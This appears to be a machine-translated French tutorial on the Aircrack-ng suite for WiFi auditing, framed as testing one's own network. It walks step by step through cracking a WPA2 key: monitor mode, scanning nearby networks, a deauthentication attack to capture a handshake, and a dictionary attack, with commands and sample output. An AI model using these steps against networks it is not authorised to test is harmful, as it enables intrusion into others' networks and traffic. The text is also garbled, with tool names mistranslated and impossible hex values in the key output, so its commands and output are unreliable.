Comment utiliser Aircrack-ng

Comment utiliser Aircrack-ng
La plupart du temps, les gens ne pensent jamais au réseau auquel ils sont connectés. Ils ne pensent jamais à quel point ce réseau est sécurisé et à quel point ils risquent leurs données confidentielles au quotidien. Vous pouvez effectuer des vérifications de vulnérabilité sur vos réseaux WiFi en utilisant un outil très puissant appelé Avion-ng et Wireshark. Wireshark est utilisé pour surveiller l'activité du réseau. Avion-ng ressemble plus à un outil agressif qui vous permet de pirater et de donner accès aux connexions sans fil. Penser comme un intrus a toujours été le moyen le plus sûr de vous protéger contre un piratage. Vous pourrez peut-être saisir les actions exactes qu'un intrus prendra pour obtenir l'accès à votre système en apprenant Aircrack. Vous pouvez ensuite effectuer des vérifications de conformité sur votre propre système pour vous assurer qu'il n'est pas peu sûr.

Avion-ng est un ensemble complet de logiciels conçus pour tester la sécurité du réseau wifi. Ce n'est pas seulement un seul outil, mais une collection d'outils, chacun qui accomplit un objectif particulier. Différents domaines de la sécurité WiFi peuvent être travaillés, comme surveiller le point d'accès, tester, attaquer le réseau, craquer le réseau WiFi et le tester. L'objectif clé de Aircrack est d'intercepter les paquets et de déchiffrer les hachages pour briser les mots de passe. Il prend en charge presque toutes les nouvelles interfaces sans fil. Avion-ng est une version améliorée d'un avion de suite d'outils obsolètes, Ng fait référence au Nouvelle génération. Certains des outils impressionnants qui travaillent ensemble pour éliminer une tâche plus grande.

Airmon-ng:

Airmon-NG est inclus dans le kit Aircrack-NG qui place la carte d'interface réseau en mode moniteur. Les cartes réseau n'accepteront généralement que les paquets ciblés pour eux tels que définis par l'adresse MAC du NIC, mais avec Airmon-NG, tous les paquets sans fil, qu'ils soient ciblés pour eux ou non, seront également acceptés. Vous devriez pouvoir attraper ces paquets sans lier ou vous authentifier avec le point d'accès. Il est utilisé pour vérifier l'état d'un point d'accès en mettant l'interface réseau en mode moniteur. Tout d'abord, il faut configurer les cartes sans fil pour allumer le mode moniteur, puis tuer tous les processus d'arrière-plan si vous pensez que tout processus interfère avec lui. Après terminer les processus, le mode Monitor peut être activé sur l'interface sans fil en exécutant la commande ci-dessous:

ubuntu @ ubuntu: ~ $ sudo airmon-ng start wlan0 #

Vous pouvez également désactiver le mode Monitor en arrêtant Airmon-NG à tout moment en utilisant la commande ci-dessous:

Ubuntu @ Ubuntu: ~ $ sudo Airmon-ng stop wlan0 #

Airodump-ng:

AiroDump-NG est utilisé pour énumérer tous les réseaux qui nous entourent et pour afficher des informations précieuses à leur sujet. La fonctionnalité de base de AiroDump-NG est de renifler les paquets, il est donc essentiellement programmé pour saisir tous les paquets qui nous entourent tout en étant mis en mode moniteur. Nous l'exécuterons contre toutes les connexions qui nous entourent et collecterons des données comme le nombre de clients connectés au réseau, leurs adresses MAC correspondantes, leur style de chiffrement et leurs noms de canaux, puis commencer à cibler notre réseau cible.

En tapant la commande AiroDump-NG et en lui donnant le nom d'interface réseau comme paramètre, nous pouvons activer cet outil. Il répertorie tous les points d'accès, la quantité de paquets de données, les méthodes de chiffrement et d'authentification utilisées et le nom du réseau (ESSID). D'un point de vue de piratage, les adresses MAC sont les champs les plus importants.

Ubuntu @ Ubuntu: ~ $ sudo Airodump-ng wlx0mon

Aircrack-ng:

Aircrack est utilisé pour la fissuration du mot de passe. Après avoir capturé tous les paquets à l'aide d'AiroDump, nous pouvons casser la clé par Aircrack. Il fissure ces clés en utilisant deux méthodes PTW et FMS. L'approche PTW se fait en deux phases. Au début, seuls les paquets ARP sont utilisés, et seulement alors, si la clé n'est pas craquelée après la recherche, elle utilise tous les autres paquets capturés. Un point plus de l'approche PTW est que tous les paquets ne sont pas utilisés pour la fissuration. Dans la deuxième approche, je.e., FMS, nous utilisons à la fois les modèles statistiques et les algos de force brute pour craquer la clé. Une méthode de dictionnaire peut également être utilisée.

AirEplay-ng:

AirPlay-NG présente des paquets à un réseau sans fil pour créer ou accélérer le trafic. Les paquets de deux sources différentes peuvent être capturés par AirEplay-ng. Le premier est le réseau en direct, et le second est les paquets du fichier PCAP déjà existant. AirPlay-NG est utile lors d'une attaque de désauthentification qui cible un point d'accès sans fil et un utilisateur. De plus, vous pouvez effectuer certaines attaques comme le café Latte Attack avec AirPlay-NG, un outil qui vous permet d'obtenir une clé du système du client. Vous pouvez y parvenir en attrapant un paquet ARP, puis en le manipulant et en le renvoyant au système. Le client créera ensuite un paquet qui peut être capturé par AiroDump et Aircrack fissure la clé de ce paquet modifié. Certaines autres options d'attaque de AirPlay-NG incluent Chopchop, Fragment ArePreplay, etc.

Airbase-NG:

Airbase-NG est utilisé pour transformer l'ordinateur d'un intrus en un point de connexion compromis pour que d'autres se lient. En utilisant Airbase-NG, vous pouvez prétendre être un point d'accès légal et mener des attaques d'homme dans le milieu d'ordinateurs qui sont attachés à votre réseau. Ces types d'attaques sont appelés attaques jumelles maléfiques. Il est impossible pour les utilisateurs de base de discerner entre un point d'accès juridique et un faux point d'accès. Ainsi, la méchante menace jumelle est parmi les menaces sans fil les plus menaçantes auxquelles nous sommes confrontés aujourd'hui.

AirOlib-ng:

AirOlib accélère le processus de piratage en stockant et en gérant les listes de mots de passe et le point d'accès. Le système de gestion de la base de données utilisé par ce programme est SQLite3, qui est principalement disponible sur toutes les plateformes. La fissuration du mot de passe comprend le calcul de la clé maîtresse par paire à travers laquelle la clé transitoire privée (PTK) est extraite. En utilisant le PTK, vous pouvez déterminer le code d'identification du message du trame (MIC) pour un paquet donné et trouver théoriquement que le micro soit similaire au paquet, donc si le PTK avait raison, le PMK avait également raison également.

Pour voir les listes de mots de passe et les réseaux d'accès stockés dans la base de données, saisissez la commande suivante:

Ubuntu @ Ubuntu: ~ $ sudo AirOlib-ng TestDatabase -stats

Ici, TestDatabase est la base de données que vous souhaitez accéder ou créer, et -stats est l'opération que vous souhaitez effectuer dessus. Vous pouvez effectuer plusieurs opérations sur les champs de base de données, comme donner un maximum de priorité à une certaine SSID ou quelque chose. Pour utiliser AirOlib-NG avec Aircrack-NG, entrez la commande suivante:

ubuntu @ ubuntu: ~ $ sudo aércrack-ng -r testDatabase wpa2.eapol.casquette

Ici, nous utilisons les PMK déjà calculés dans le testdatabase pour accélérer le processus de fissuration du mot de passe.

Cracking WPA / WPA2 en utilisant Aircrack-NG:

Regardons un petit exemple de ce que Aircrack-NG peut faire avec l'aide de quelques-uns de ses outils impressionnants. Nous allons casser la clé pré-partagée d'un réseau WPA / WPA2 en utilisant une méthode de dictionnaire.

La première chose que nous devons faire est d'énumérer les interfaces réseau qui prennent en charge le mode de moniteur. Cela peut être fait en utilisant la commande suivante:

Ubuntu @ Ubuntu: ~ $ sudo Airmon-ng
Chipset de pilote d'interface Phy
Phy0 WLX0 RTL8XXXU REALTEK Semiconductor Corp.

Nous pouvons voir une interface; Maintenant, nous devons mettre l'interface réseau que nous avons trouvée (WLX0) en mode Monitor en utilisant la commande suivante:

ubuntu @ ubuntu: ~ $ sudo airmon-ng start wlx0

Il a activé le mode de moniteur sur l'interface appelée wlx0mon.

Maintenant, nous devrions commencer à écouter les diffusions par des routeurs à proximité via notre interface réseau que nous avons mis en mode moniteur.

Ubuntu @ Ubuntu: ~ $ sudo Airodump-ng wlx0mon
CH 5] [écoulé: 30 s] [2020-12-02 00:17
BSSID PWR BACONS #DATA, # / S CH MB ENC CIPHER AUTH ESID
E4: 6f: 13: 04: CE: 31 -45 62 27 0 1 54E WPA2 CCMP PSK Crackit
C4: E9: 84: 76: 10: être -63 77 0 0 6 54E. WPA2 CCMP PSK Hackme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54E WPA2 CCMP PSK NET07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54E WPA2 CCMP PSK TP-LINK_3802
BSSID Station PWR Rate Perte des cadres
E4: 6f: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1E 8 5
E4: 6f: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1E- 6E 0 3
E4: 6f: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6f: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0E- 1 1002 13

Notre réseau cible est Craque le Dans ce cas, qui fonctionne actuellement sur la chaîne 1.

Ici, afin de casser le mot de passe du réseau cible, nous devons capturer une poignée de main à 4 voies, qui se produit lorsqu'un appareil essaie de se connecter à un réseau. Nous pouvons le capturer en utilisant la commande suivante:

ubuntu @ ubuntu: ~ $ sudo Airodump-ng -c 1 --bssid e4: 6f: 13: 04: ce: 31 -w / home wlx0

-c : Canaliser

-bssid: BSSID du réseau cible

-w : Le nom du répertoire où le fichier PCAP sera placé

Maintenant, nous devons attendre qu'un appareil se connecte au réseau, mais il existe une meilleure façon de capturer une poignée de main. Nous pouvons désactiver les appareils à l'AP à l'aide d'une attaque de déshabitation à l'aide de la commande suivante:

Ubuntu @ Ubuntu: ~ $ sudo AirEplay-ng -0 -a E4: 6f: 13: 04: CE: 31

un: BSSID du réseau cible

-0: Attaque de la déshonmentation

Nous avons déconnecté tous les appareils, et maintenant nous devons attendre qu'un appareil se connecte au réseau.

CH 1] [écoulé: 30 s] [2020-12-02 00:02] [WPA Handshake: E4: 6F: 13: 04: CE: 31
BSSID PWR RXQ BACONS #DATA, # / S CH MB ENC CIPHER AUTH E
E4: 6f: 13: 04: CE: 31 -47 1 228 807 36 1 54E WPA2 CCMP PSK P
BSSID Station PWR Rate Perte des cadres
E4: 6f: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6f: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0E- 1E 0 22
E4: 6f: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0E- 1 0 32
E4: 6f: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0E- 6E 263 708 CRACKIT
E4: 6f: 13: 04: CE: 31 D4: 6A: 6A: 99: Ed: E3 -35 0E- 0E 0 86
E4: 6f: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1E 0 1

Nous avons eu un coup, et en regardant le coin supérieur droit juste à côté de l'époque, nous pouvons voir qu'une poignée de main a été capturée. Regardez maintenant dans le dossier spécifié ( /maison Dans notre cas) pour un «.PCAP" déposer.

Afin de casser la touche WPA, nous pouvons utiliser la commande suivante:

Ubuntu @ Ubuntu: ~ $ sudo aércrack-ng -a2 -w rockyou.TXT -B E4: 6F: 13: 04: CE: 31 PAPIE.casquette
B: BSSID du réseau cible
-A2: mode WPA2
Rockyou.txt: le fichier du dictionnaire utilisé
Poignée de main.Cap: le fichier qui contient une poignée de main capturée
Aircrack-ng 1.2 Beta3
[00:01:49] 10566 Clés testées (1017.96 k / s)
Clé trouvée! [ tu m'as eu ]
Clé maître: 8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0c 06 08 Ed BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Clé transitoire: 4d C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
Mac: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5d 71

La clé de notre réseau cible a été fissurée avec succès.

Conclusion:

Les réseaux sans fil sont partout, utilisés par chaque entreprise, des travailleurs utilisant des smartphones aux appareils de contrôle industriels. Selon la recherche, presque plus de 50% du trafic Internet aura lieu au cours du WiFi en 2021. Les réseaux sans fil présentent de nombreux avantages, la communication à l'extérieur des portes, l'accès rapide à Internet dans des endroits où il est presque impossible de poser des fils, peut étendre le réseau sans installer des câbles pour aucun autre utilisateur et peut facilement connecter vos appareils mobiles à vos bureaux à domicile pendant que vous êtes 't là.

Malgré ces avantages, il y a un grand point d'interrogation sur votre confidentialité et votre sécurité. Comme ces réseaux; Dans la gamme d'émission de routeurs, sont ouverts à tout le monde, ils peuvent facilement être attaqués et vos données peuvent facilement être compromises. Par exemple, si vous êtes connecté à un WiFi public, toute personne connectée à ce réseau peut facilement vérifier le trafic de votre réseau à l'aide d'une intelligence et à l'aide d'outils impressionnants disponibles et même de le vider.